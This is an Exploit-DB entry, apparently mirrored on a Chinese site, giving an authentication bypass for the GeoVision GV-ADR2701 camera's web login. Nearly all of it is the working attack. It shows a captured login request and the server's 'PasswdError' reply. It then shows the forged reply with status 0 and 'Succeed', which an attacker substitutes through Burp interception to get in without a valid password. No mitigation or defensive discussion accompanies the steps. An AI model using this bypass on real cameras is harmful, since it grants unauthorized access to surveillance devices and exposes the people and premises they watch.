GeoVision Camera GV-ADR2701 – Authentication Bypass - 体验盒子

作者： Chan Nyein Wai

日期： 2023-04-01

类别：

webapps

平台：

hardware

来源：https://www.exploit-db.com/exploits/51179/

# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass 
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10

# Exploitation
1. Capture The Login Request with burp, Do intercept request to response

Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1

{"UserName":"admin","Password":"0X]&0D]]05"}
```

2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```

By editing the response to the following, you can successfully log in to
the web application.

```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```